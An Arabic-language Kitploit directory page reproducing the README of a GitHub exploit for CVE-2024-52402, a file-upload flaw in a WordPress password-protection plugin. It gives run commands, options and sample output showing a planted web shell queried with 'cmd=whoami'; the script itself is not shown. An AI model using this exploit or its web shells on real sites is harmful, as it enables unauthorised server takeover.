Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-52402 — إضافة WordPress Exclusive Content Password Protect <= 1.1.0 - ثغرة CSRF تؤدي إلى رفع ملفات تعسفي | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-52402
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubnxploited/cve-2024-52402

CVE-2024-52402

إضافة WordPress Exclusive Content Password Protect <= 1.1.0 - ثغرة CSRF تؤدي إلى رفع ملفات تعسفي

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚀 استغلال ثغرة CVE-2024-52402: إضافة Exclusive Content Password Protect في WordPress <= 1.1.0

🛡️ نظرة عامة

يستهدف هذا الاستغلال ثغرة تزوير الطلبات عبر المواقع (CSRF) في إضافة Exclusive Content Password Protect في WordPress، بالإصدارات حتى 1.1.0 وما يشملها. تتيح هذه الثغرة للمهاجم رفع Web Shell إلى خادم الويب، مما قد يؤدي إلى تنفيذ أكواد برمجية عن بُعد.

📅 التفاصيل

  • تاريخ النشر: 2024-11-19
  • معرف CVE: CVE-2024-52402
  • إصدار الإضافة: Exclusive Content Password Protect <= 1.1.0
  • الخطورة: حرجة (CVSS 9.6)

⚙️ الاستخدام

لاستغلال هذه الثغرة، يجب توفير رابط موقع WordPress المستهدف واسم مستخدم وكلمة مرور صالحين. سيسجل سكربت الاستغلال الدخول إلى موقع WordPress ويحاول رفع Web Shell.

🔧 الأمر

root@kitploit:~
python CVE-2024-52402.py -u <target> -un <username> -p <password>

🛠️ الخيارات

root@kitploit:~
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password

🌟 مثال

root@kitploit:~
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin

🚀 مثال على المخرجات

root@kitploit:~
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami

📜 الوصف

يستغل هذا السكربت ثغرة CSRF في إضافة Exclusive Content Password Protect لرفع Web Shell إلى خادم WordPress. ومع ذلك، فهو لا ينفذ هجوم CSRF بشكل مباشر؛ بل يركز على استغلال وظيفة رفع الملفات في الإضافة لتحقيق الاستغلال.

👨‍💻 كيفية تشغيل السكربت

  1. استنساخ المستودع

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-52402.git
    cd CVE-2024-52402
    
  2. تثبيت المتطلبات تأكد من تثبيت مكتبة requests:

    root@kitploit:~
    pip install requests
    
  3. تشغيل السكربت استخدم الأمر التالي لتنفيذ السكربت:

    root@kitploit:~
    python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
    

🛡️ التخفيف

للتخفيف من هذه الثغرة، قم بتحديث إضافة Exclusive Content Password Protect إلى أحدث إصدار حيث تم إصلاح هذه المشكلة.

⚠️ إخلاء مسؤولية

هذا السكربت مخصص للأغراض التعليمية فقط. الاستخدام غير المصرح به لهذا السكربت ضد أنظمة ليس لديك إذن صريح لاختبارها يعد غير قانوني وغير أخلاقي.

الاستغلال بواسطة: Nxploit، Khaled alenazi.

تنزيل الأداة